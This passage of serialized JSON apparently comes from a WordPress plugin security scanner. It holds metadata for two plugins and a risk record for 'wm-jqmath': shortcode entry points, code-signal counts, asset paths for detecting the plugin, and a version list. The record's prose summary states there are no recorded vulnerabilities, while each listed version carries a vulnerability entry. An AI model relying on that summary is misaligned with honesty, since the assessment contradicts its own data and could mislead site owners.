Malmgren","https:\u002F\u002Fprofiles.wordpress.org\u002Ffredrikmalmgren\u002F","\u003Cp>With Clean up wp_head you can easily remove all those unused tags in wp_head.\u003C\u002Fp>\n\u003Ch4>Usage\u003C\u002Fh4>\n\u003Col>\n\u003Cli>Go to ‘Clean up wp_head’ under ‘Settings’ menu\u003C\u002Fli>\n\u003Cli>Change the options of your choice\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>Follow the development of this plugin at \u003Ca href=\"http:\u002F\u002Ffredrikmalmgren.com\u002Fwordpress\u002Fplugins\u002Fclean-up-wp-head\u002F\" title=\"Clean up wp_head - Fredrik Malmgren\" rel=\"nofollow ugc\">FredrikMalmgren.com\u003C\u002Fa>.\u003C\u002Fp>\n","Use Clean up wp_head to remove unused tags in 
wp_head.",6494,"2012-11-05T22:03:00.000Z","3.4.2",[158,159,160,161,162],"rsd","start_post_rel","wlwmanifest","wp_generator","wp_head","http:\u002F\u002Ffredrikmalmgren.com\u002Fwordpress\u002Fplugins\u002Fclean-up-wp-head\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fclean-up-wp-head.0.2.1.zip",{"attackSurface":166,"codeSignals":181,"taintFlows":188,"riskAssessment":189,"analyzedAt":197},{"hooks":167,"ajaxHandlers":168,"restRoutes":169,"shortcodes":170,"cronEvents":179,"entryPointCount":180,"unprotectedCount":84},[],[],[],[171,176],{"tag":172,"callback":173,"file":174,"line":175},"enable_jqmath","enable_jqMath","wm_jqmath.php",38,{"tag":20,"callback":177,"file":174,"line":178},"generate_jqMathFormula",39,[],2,{"dangerousFunctions":182,"sqlUsage":183,"outputEscaping":185,"fileOperations":84,"externalRequests":84,"nonceChecks":84,"capabilityChecks":84,"bundledLibraries":187},[],{"prepared":84,"raw":84,"locations":184},[],{"escaped":84,"rawEcho":84,"locations":186},[],[],[],{"summary":190,"deductions":191},"The wm-jqmath plugin v1.3 exhibits a strong security posture based on the provided static analysis and vulnerability history. The code appears to follow best practices by not utilizing dangerous functions, all SQL queries are prepared, and all outputs are properly escaped. The absence of file operations and external HTTP requests further reduces the attack surface. Notably, there are no recorded vulnerabilities (CVEs) for this plugin, indicating a history of stable and secure development or a lack of prior discovery. The limited attack surface, consisting solely of two shortcodes, is also a positive sign.  However, the complete absence of nonce checks and capability checks on these shortcodes represents a potential oversight. 
While no vulnerabilities are immediately apparent from the static analysis due to the lack of complex flows, an attacker could potentially exploit these entry points if they were to lead to any sensitive operations or unintended behavior that isn't properly secured.",[192,195],{"reason":193,"points":194},"Shortcodes lack nonce checks",5,{"reason":196,"points":194},"Shortcodes lack capability checks","2026-03-16T23:04:32.074Z",{"wat":199,"direct":208},{"assetPaths":200,"generatorPatterns":203,"scriptPaths":204,"versionParams":205},[201,202],"\u002Fwp-content\u002Fplugins\u002Fwm-jqmath\u002Fcss\u002Fjqmath-0.4.3.css","\u002Fwp-content\u002Fplugins\u002Fwm-jqmath\u002Fjs\u002Fjqmath-etc-0.4.3.min.js",[],[202],[206,207],"wm-jqmath\u002Fcss\u002Fjqmath-0.4.3.css?ver=","wm-jqmath\u002Fjs\u002Fjqmath-etc-0.4.3.min.js?ver=",{"cssClasses":209,"htmlComments":210,"htmlAttributes":211,"restEndpoints":213,"jsGlobals":214,"shortcodeOutput":215},[],[],[212],"style",[],[],[216],"\u003Cspan",{"slug":4,"current_version":6,"total_versions":218,"versions":219},4,[220,227,235,243],{"version":6,"download_url":24,"svn_tag_url":221,"released_at":34,"has_diff":45,"diff_files_changed":222,"diff_lines":34,"trac_diff_url":223,"vulnerabilities":224,"is_current":226},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwm-jqmath\u002Ftags\u002F1.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwm-jqmath%2Ftags%2F1.2&new_path=%2Fwm-jqmath%2Ftags%2F1.3",[225],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":34},true,{"version":228,"download_url":229,"svn_tag_url":230,"released_at":34,"has_diff":45,"diff_files_changed":231,"diff_lines":34,"trac_diff_url":232,"vulnerabilities":233,"is_current":45},"1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwm-jqmath.1.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwm-jqmath\u002Ftags\u002F1.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u0
02Fchangeset?old_path=%2Fwm-jqmath%2Ftags%2F1.1&new_path=%2Fwm-jqmath%2Ftags%2F1.2",[234],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":34},{"version":236,"download_url":237,"svn_tag_url":238,"released_at":34,"has_diff":45,"diff_files_changed":239,"diff_lines":34,"trac_diff_url":240,"vulnerabilities":241,"is_current":45},"1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwm-jqmath.1.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwm-jqmath\u002Ftags\u002F1.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwm-jqmath%2Ftags%2F1.0&new_path=%2Fwm-jqmath%2Ftags%2F1.1",[242],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":34},{"version":89,"download_url":244,"svn_tag_url":245,"released_at":34,"has_diff":45,"diff_files_changed":246,"diff_lines":34,"trac_diff_url":34,"vulnerabilities":247,"is_current":45},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwm-jqmath.1.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwm-jqmath\u002Ftags\u002F1.0\u002F",[],[248],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":34}]